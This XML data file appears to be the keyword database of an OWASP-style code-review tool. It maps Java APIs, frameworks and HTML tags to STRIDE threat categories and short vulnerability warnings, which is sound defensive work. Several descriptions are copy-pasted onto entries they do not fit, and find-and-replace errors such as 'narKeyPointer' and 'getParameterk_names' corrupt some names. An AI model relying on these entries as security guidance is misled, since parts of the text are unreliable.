</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Hack</k_name>
<k_level>2</k_level>
<k_description>Developers say the darnedest thing in their source code. Look for the following keywords as pointers to possible software vulnerabilities.. ahhh those developers!</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getRequestedSessionId</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getValue</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getComment</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getDomain</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getPath</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getk_name</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>update</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>setHeader</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>addHeader</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getWriter</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getOutputStream</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>executequery</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ExecuteReader</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.PrintWriter.print</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>jdbc</k_name>
<k_level>2</k_level>
<k_description>JDBC is not associated with a trusted SQL Server connection and / or credentials are stored in clear text</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>select</k_name>
<k_level>2</k_level>
<k_description>Using SELECT * makes your code vulnerable to changes in underlying table(s) and as such should be avoided</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>insert</k_name>
<k_level>2</k_level>
<k_description>Exploiting INSERT statements an attacker is not given any feedback over http or web page while a SELECT statement an attacker might receive back errors from the SQL server. This could be a case of a blind SQL injection attempt so use carefully</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>execute</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.ResultSet.getString</k_name>
<k_level>2</k_level>
<k_description>In JDBC 1.0, java.sql.ResultSet.getString() function provide the ResultSet interface a limited functionality</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.ResultSet.getObject</k_name>
<k_level>2</k_level>
<k_description>In JDBC 1.0, java.sql.ResultSet.getString() function provide the ResultSet interface a limited functionality</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
</KeyPointer>
<KeyPointer>
<k_name>innerHtml</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks results from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>innertext</k_name>
<k_level>2</k_level>
<k_description>Here we are looking for responses to the client. Responses which go unvalidated or which echo external input without data validation are key areas to examine. Many client side attacks results from poor response validation. XSS relies on this somewhat.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.execute</k_name>
<k_level>2</k_level>
<k_description>Locating where a database may be involved in the code is an important aspect of the code review. Looking at the database code will help determinate if the application is vulnerable to SQL Injection. One aspect of this is to verify that the code uses either SqlParameter, OleDbParameter or OdbcParameter(System.Data.SqlClient). These are type and treats parameter as the literal value and not the executable code in the database.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Statement.addBatch</k_name>
<k_level>2</k_level>
<k_description>It is recommende not to use this function because there could be a database access error would fail the operation and/ or the driver may not support the batch updates</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.sql.Connection.prepareStatement</k_name>
<k_level>2</k_level>
<k_description>Although Prepared Statements helps in defending against SQL Injection, there are possibilities of SQL Injection attacks through inappropriate usage of Prepared Statements. Foe example a scenario where the input variables are passed directly into the Prepared Statement and thereby paving way for SQL Injection attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.FileReader</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.FileWriter</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.RandomAccessFile</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.File</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.FileOutputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getParameterk_names</k_name>
<k_level>2</k_level>
<k_description>This API call may be avenues for parameter, header, URL &amp; Cookie tampering, HTTP Response Splitting and information leakage. They should be examined closely as may of such API&apos;s obtain the parameters directly from HTTP requests.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>invalidate</k_name>
<k_level>2</k_level>
<k_description>Always be scared of the session management. Look at each session object within the application and ensure the level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>getId</k_name>
<k_level>2</k_level>
<k_description>Always be scared of the session management. Look at each session object within the application and ensure the level of security meets the requirements.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.lang.Runtime.exec</k_name>
<k_level>2</k_level>
<k_description>This k_name may be vulnerable to command injection attacks or OS injection attacks. Java linking to the native OS can cause serious issues and potentially give rise to total server compromise.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>java.io.PrintStream.write</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4j</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>jLo</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Lumberjack</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>MonoLog</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>qflog</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>just4log</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4Ant</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>JDLabAgent</k_name>
<k_level>2</k_level>
<k_description>We may come across some information leakage by examing code below contained in ones application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Ajax</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>XMLHTTP</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Struts</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.apache.struts</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Spring</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>org.springframework</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Java Server Faces (JSF)</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>import javax.faces</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>### Hibernate</k_name>
<k_level>2</k_level>
<k_description>If we can identify major architectural components within that application (right away) it can help narKeyPointer our search, and we can then look for known vulnerabilities in those components and frameworks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>import org.hibernate</k_name>
<k_level>2</k_level>
<k_description>Operations performed via a stateless session bypass Hibernate's event model and interceptors. Stateless sessions are vulnerable to data aliasing effects, due to the lack of a first-level cache</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frameset&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;embed&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frame&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;html&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;iframe&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;img&gt;</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;style&gt;</k_name>
<k_level>2</k_level>
